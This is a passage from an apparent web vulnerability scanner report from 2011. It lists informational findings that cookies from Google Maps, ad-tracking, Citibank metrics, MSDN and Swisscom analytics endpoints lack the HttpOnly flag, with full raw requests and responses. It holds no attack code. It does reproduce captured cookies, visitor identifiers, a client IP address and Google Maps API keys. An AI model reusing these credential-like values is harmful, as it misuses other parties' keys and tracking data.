GET /dcsmgru7m99k7mqmgrhudo0k8_8c6m/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&dcsdat=1303660659262&dcssip=msdn.microsoft.com&dcsuri=/en-us/&WT.tz=-5&WT.bh=10&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=MSDN%20|%20Microsoft%20Development,%20Subscriptions,%20Resources,%20and%20More&WT.js=Yes&WT.jv=1.5&WT.bs=980x907&WT.fi=Yes&WT.fv=10.2&WT.sp=_msdn_&WT.dl=0&WT.dcsvid=GUID=845eef4a7ff18745a494666b76292718%26HASH=4aef%26LV=20114%26V=3&WT.dcsdat=1303660659262&WT.wtsv=1&WT.sv_sp=_msdn_&WT.co_f=173.193.214.243-2082981296.30145999&WT.vt_f_tlh=1303567297&WT.vt_f_tlv=1303565933&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_sid=173.193.214.243-2082981296.30145999.1303660659266&WT.vt_nvr0=1&WT.vt_nvr2=1&WT.vt_nvr3=1&wt_date=2011/4/24&wt_dos=1&wtDrillDir=/en-us/&wtEvtSrc=msdn.microsoft.com/en-us/ HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yMDgyOTgxMjk2LjMwMTQ1OTk5AAAAAAAFAAAACgAAAL/bsk2/27JNHwEAALlwrU2wcK1NbQEAAHXWsk1q1rJNKwIAAODYsk3U2LJNDQAAAHBItE1wSLRNBAAAABMAAAC/27JN1NiyTWYAAAC5cK1NsHCtTXEAAAB11rJNatayTRUAAABwSLRNcEi0TQAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 15:59:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yMDgyOTgxMjk2LjMwMTQ1OTk5AAAAAAAFAAAACgAAAL/bsk2/27JNHwEAALlwrU2wcK1NbQEAAHXWsk1q1rJNKwIAAODYsk3U2LJNDQAAAMVItE1wSLRNBAAAABMAAAC/27JN1NiyTWYAAAC5cK1NsHCtTXEAAAB11rJNatayTRUAAADFSLRNcEi0TQAAAAA-; path=/; expires=Wed, 21-Apr-2021 15:59:01 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

18.347. http://maps.google.co.in/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.co.in
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps?oe=utf-8&client=firefox-a&ie=UTF8&q=701+Concord+Ave+Cambridge,+MA+02138&fb=1&gl=in&hnear=&cid=0,0,5277742105129806573&ei=Alb_S-73KMeyrAePyonKDg&ved=0CBYQnwIwAA&hq=701+Concord+Ave+Cambridge,+MA+02138&source=embed&ll=42.408249,-71.147118&spn=0.126748,0.256462&z=12&iwloc=A&output=embed HTTP/1.1
Host: maps.google.co.in
Proxy-Connection: keep-alive
Referer: http://echomail.com/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:30:22 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=1fb5bd1c5e16dcbd:TM=1303695022:LM=1303695022:S=5XtueIRbOYQ5BPsM; expires=Wed, 24-Apr-2013 01:30:22 GMT; path=/; domain=.google.co.in
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Content-Length: 137621

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="View maps and find local b
...[SNIP]...

18.348. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps?file=api&v=2&key=ABQIAAAAKxr92Gm_sSdbyYjdfIohNBS56gaUdzSHikA3rZ4TSkI7F88_jRTbY3PI3cfvlE9j9NeJo1pguo933w HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.google.com

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=555de6bc41a867ca:TM=1303663589:LM=1303663589:S=L93IJxO821-Gt4oS; expires=Tue, 23-Apr-2013 16:46:29 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:46:29 GMT
Server: mfe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Expires: Sun, 24 Apr 2011 16:46:29 GMT
Content-Length: 10192

var G_INCOMPAT = false;function GScript(src) {document.write('<' + 'script src="' + src + '"' +' type="text/javascript"><' + '/script>');}function GBrowserIsCompatible() {if (G_INCOMPAT) return false;
...[SNIP]...

18.349. http://maps.google.com/maps/vp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/vp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/vp?spn=0,0&z=0&key=ABQIAAAAxlNjcILiMUNra09cJ_A5shTJTasaZLGu-S0MxpFJaRF7NywsZRSBRU3tj6CuxjTTjBB8JFKkUFVXXA&mapclient=jsapi&vp=32.802113,-96.81313 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.google.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:08:15 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=b39a2ada5444a96c:TM=1303675695:LM=1303675695:S=0f9paHWNl-6dIIAm; expires=Tue, 23-Apr-2013 20:08:15 GMT; path=/; domain=.google.com
Set-Cookie: NID=46=gD4l26ZNya8U_3fqii8vnOrTfkCU8RRH2dCn1Q6L6dRupR6WdRSE6FCGZ5U7rJbVbdEcHO3hFoUAZpBx6De3hmSxhaesN3dtTJBPnHQuuz9SbFTHyGMkx80Lsle-O2tC; expires=Mon, 24-Oct-2011 20:08:15 GMT; path=/; domain=.google.com; HttpOnly
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Content-Length: 604

window.GAppFeatures && window.GAppFeatures({cb:{bounds:[{s:32787275,w:-96833496,n:32805745,e:-96811523,ix:-1}]}
,traffic:{bounds:[{s:29974000,w:-125485840,n:49200000,e:-82342500,ix:0},{s:32167236,w:-9
...[SNIP]...

18.350. http://media.fastclick.net/w/tre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=20016;evt=13529;cat1=13666;cat2=15184 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pluto2=728800512746; lyc=BAAAAARUu69NACAAATxgIASgAAXhVAAAj7qAFwFmUKAUIAAGizcAAGuRs2AvATBOIBCgAAFQO6AIIADgBRcBAAA=; pluto=728800512746

Response

HTTP/1.1 302 Redirect
Date: Sun, 24 Apr 2011 03:08:32 GMT
Location: http://www.googleadservices.com/pagead/conversion/1032669722/?label=RSh3CL6z3gEQmpS17AM&amp;guid=ON&amp;script=0
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: lyc=BAAAAARUu69NACAAATxgIASgAAXhVAAAj7qAFwFmUKAUIAAGizcAAGuRs2AvATBOIBCgAAFQO6AIIADgBRcBAAA=; domain=.fastclick.net; path=/; expires=Tue, 23-Apr-2013 03:08:32 GMT
Set-Cookie: pluto=728800512746; domain=.fastclick.net; path=/; expires=Tue, 23-Apr-2013 03:08:32 GMT


18.351. http://metrics.citibank.com/b/ss/prod/1/H.22.1/s0465555016417  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.citibank.com
Path:   /b/ss/prod/1/H.22.1/s0465555016417

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/prod/1/H.22.1/s0465555016417?AQB=1&ndh=1&t=24%2F3%2F2011%2014%3A44%3A23%200%20300&g=http%3A%2F%2Fwww.identitymonitor.citi.com%2F&cc=USD&ch=CARDSPublic&c1=Teleformix&h1=CARDSPublic%2FTeleformix%2FIdentityMonitor&c2=IdentityMonitor&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.citibank.com
Proxy-Connection: keep-alive
Referer: http://www.identitymonitor.citi.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 19:46:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA3EFF851D3CA9-4000010840236C3F[CE]; Expires=Fri, 22 Apr 2016 19:46:07 GMT; Domain=.citibank.com; Path=/
Location: http://metrics.citibank.com/b/ss/prod/1/H.22.1/s0465555016417?AQB=1&pccr=true&vidn=26DA3EFF851D3CA9-4000010840236C3F&&ndh=1&t=24%2F3%2F2011%2014%3A44%3A23%200%20300&g=http%3A%2F%2Fwww.identitymonitor.citi.com%2F&cc=USD&ch=CARDSPublic&c1=Teleformix&h1=CARDSPublic%2FTeleformix%2FIdentityMonitor&c2=IdentityMonitor&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 19:46:07 GMT
Last-Modified: Mon, 25 Apr 2011 19:46:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www66
Content-Length: 0
Content-Type: text/plain


18.352. http://msdn.microsoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msdn.microsoft.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; WT_NVR_RU=0=technet:1=:2=; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; msdn=L=1033; ixpLightBrowser=0; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_nr=1303567265614-New; _opt_vi_DANG4OLL=2A807526-0B45-4F67-8001-CE6244FF15CF; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/23/2011 14:01:21&Microsoft.VisitStartDate=04/23/2011 13:49:08&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=6&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303556497823:ss=1303555133331

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /en-us/
Server: Microsoft-IIS/7.5
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:38 GMT
Content-Length: 124

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/en-us/">here</a>.</h2>
</body></html>

18.353. http://o.swisscom.ch/b/ss/swisscom-onelive/1/H.21/s01998541245702  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.swisscom.ch
Path:   /b/ss/swisscom-onelive/1/H.21/s01998541245702

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/swisscom-onelive/1/H.21/s01998541245702?AQB=1&ndh=1&t=24/3/2011%2013%3A50%3A1%200%20300&vmt=49EAF7F8&ce=ISO-8859-1&ns=swisscom&pageName=level0/de/privatkunden/61&g=http%3A//de.swisscom.ch/privatkunden&r=http%3A//de.swisscom.ch/&cc=CHF&ch=level0/privatkunden/61&v0=level0%3Anone&events=event1%2Cevent2%2Cevent20&h1=level0/de/privatkunden/61&v2=New&h2=level0/privatkunden/61&c3=New&v3=7%3A30PM&c4=7%3A30PM&v4=Sunday&c5=Sunday&v5=Weekend&c6=Weekend&v12=%28level0%3Anone%29%7Bhttp%3A//de.swisscom.ch/%7D&v14=de&v15=level0&c18=level0&v20=level0&c25=level0%3Anone%3Alevel0/de/privatkunden/61&c26=Swisscom%20-%20Privatkunden&c47=First%20Visit&c48=1&c49=level0&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: o.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://de.swisscom.ch/privatkunden
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1303671001738-New; undefined_s=First%20Visit; s_vnum=1306263001740%26vn%3D1; s_invisit=true; s_one_campaign=level0%3Anone; s_visit=1; CTQ=http%3A//de.swisscom.ch/privatkunden; B=level0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 18:49:51 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA3867851D3788-60000143400C74A3[CE]; Expires=Fri, 22 Apr 2016 18:49:51 GMT; Domain=.swisscom.ch; Path=/
Location: http://o.swisscom.ch/b/ss/swisscom-onelive/1/H.21/s01998541245702?AQB=1&pccr=true&vidn=26DA3867851D3788-60000143400C74A3&&ndh=1&t=24/3/2011%2013%3A50%3A1%200%20300&vmt=49EAF7F8&ce=ISO-8859-1&ns=swisscom&pageName=level0/de/privatkunden/61&g=http%3A//de.swisscom.ch/privatkunden&r=http%3A//de.swisscom.ch/&cc=CHF&ch=level0/privatkunden/61&v0=level0%3Anone&events=event1%2Cevent2%2Cevent20&h1=level0/de/privatkunden/61&v2=New&h2=level0/privatkunden/61&c3=New&v3=7%3A30PM&c4=7%3A30PM&v4=Sunday&c5=Sunday&v5=Weekend&c6=Weekend&v12=%28level0%3Anone%29%7Bhttp%3A//de.swisscom.ch/%7D&v14=de&v15=level0&c18=level0&v20=level0&c25=level0%3Anone%3Alevel0/de/privatkunden/61&c26=Swisscom%20-%20Privatkunden&c47=First%20Visit&c48=1&c49=level0&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 18:49:51 GMT
Last-Modified: Mon, 25 Apr 2011 18:49:51 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www426
Content-Length: 0
Content-Type: text/plain


18.354. http://o.swisscom.ch/b/ss/swisscom-onelive/1/H.21/s02805667424352  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.swisscom.ch
Path:   /b/ss/swisscom-onelive/1/H.21/s02805667424352

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/swisscom-onelive/1/H.21/s02805667424352?AQB=1&ndh=1&t=24/3/2011%2013%3A54%3A42%200%20300&vmt=49EAF7F8&ns=swisscom&g=about%3Ablank&cc=CHF&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A//gis2.begasoft.ch/gis/swisscomGIS.jsf&pid=about%3Ablank&oid=http%3A//gis2.begasoft.ch/gis/swisscomGIS.jsf%3Flang%3Den%26plang%3Den%26show%3Dshops%2Chotspots%2Cbuildings%2Cverkehr&ot=A&oi=82&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: o.swisscom.ch

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 18:56:52 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA393A051D2AEF-60000130C0472500[CE]; Expires=Fri, 22 Apr 2016 18:56:52 GMT; Domain=.swisscom.ch; Path=/
Location: http://o.swisscom.ch/b/ss/swisscom-onelive/1/H.21/s02805667424352?AQB=1&pccr=true&vidn=26DA393A051D2AEF-60000130C0472500&&ndh=1&t=24/3/2011%2013%3A54%3A42%200%20300&vmt=49EAF7F8&ns=swisscom&g=about%3Ablank&cc=CHF&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A//gis2.begasoft.ch/gis/swisscomGIS.jsf&pid=about%3Ablank&oid=http%3A//gis2.begasoft.ch/gis/swisscomGIS.jsf%3Flang%3Den%26plang%3Den%26show%3Dshops%2Chotspots%2Cbuildings%2Cverkehr&ot=A&oi=82&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 18:56:52 GMT
Last-Modified: Mon, 25 Apr 2011 18:56:52 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www334
Content-Length: 0
Content-Type: text/plain


18.355. http://o.swisscom.ch/b/ss/swisscomonlineshop/1/H.19.4/s0175835486735  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.swisscom.ch
Path:   /b/ss/swisscomonlineshop/1/H.19.4/s0175835486735

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/swisscomonlineshop/1/H.19.4/s0175835486735?AQB=1&ndh=1&t=24/3/2011%2013%3A54%3A42%200%20300&ce=ISO-8859-1&ns=swisscom&g=about%3Ablank&cc=CHF&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx&pid=about%3Ablank&oid=http%3A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx%3Fcat%3DOS_Festnetz%26sub&ot=A&oi=71&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: o.swisscom.ch

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 18:56:49 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA3938851D3655-4000010BE016F6DA[CE]; Expires=Fri, 22 Apr 2016 18:56:49 GMT; Domain=.swisscom.ch; Path=/
Location: http://o.swisscom.ch/b/ss/swisscomonlineshop/1/H.19.4/s0175835486735?AQB=1&pccr=true&vidn=26DA3938851D3655-4000010BE016F6DA&&ndh=1&t=24/3/2011%2013%3A54%3A42%200%20300&ce=ISO-8859-1&ns=swisscom&g=about%3Ablank&cc=CHF&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx&pid=about%3Ablank&oid=http%3A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx%3Fcat%3DOS_Festnetz%26sub&ot=A&oi=71&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 18:56:49 GMT
Last-Modified: Mon, 25 Apr 2011 18:56:49 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www95
Content-Length: 0
Content-Type: text/plain


18.356. http://o.swisscom.ch/b/ss/swisscompublic/1/H.16/s08473835119511  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.swisscom.ch
Path:   /b/ss/swisscompublic/1/H.16/s08473835119511

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/swisscompublic/1/H.16/s08473835119511?[AQB]&ndh=1&t=24/3/2011%2013%3A50%3A1%200%20300&vmt=49EAF7F8&ns=swisscom&pageName=/de/privatkunden/61&g=http%3A//de.swisscom.ch/privatkunden&r=http%3A//de.swisscom.ch/&cc=CHF&events=event2&v2=/de/privatkunden/61&h2=/de/privatkunden/61&c11=7%3A30PM&v11=7%3A30PM&c12=Sunday&v12=Sunday&c13=Weekend&v13=Weekend&c15=Non%20Member%20-%20/de/privatkunden/61&c16=Non%20Author%20-%20/de/privatkunden/61&c19=New&c20=/de/privatkunden/61&v22=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: o.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://de.swisscom.ch/privatkunden
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1303671001730-New

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 18:49:50 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA3867051D1D0F-60000109003DA918[CE]; Expires=Fri, 22 Apr 2016 18:49:50 GMT; Domain=.swisscom.ch; Path=/
Location: http://o.swisscom.ch/b/ss/swisscompublic/1/H.16/s08473835119511?AQB=1&pccr=true&vidn=26DA3867051D1D0F-60000109003DA918&&ndh=1&t=24/3/2011%2013%3A50%3A1%200%20300&vmt=49EAF7F8&ns=swisscom&pageName=/de/privatkunden/61&g=http%3A//de.swisscom.ch/privatkunden&r=http%3A//de.swisscom.ch/&cc=CHF&events=event2&v2=/de/privatkunden/61&h2=/de/privatkunden/61&c11=7%3A30PM&v11=7%3A30PM&c12=Sunday&v12=Sunday&c13=Weekend&v13=Weekend&c15=Non%20Member%20-%20/de/privatkunden/61&c16=Non%20Author%20-%20/de/privatkunden/61&c19=New&c20=/de/privatkunden/61&v22=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
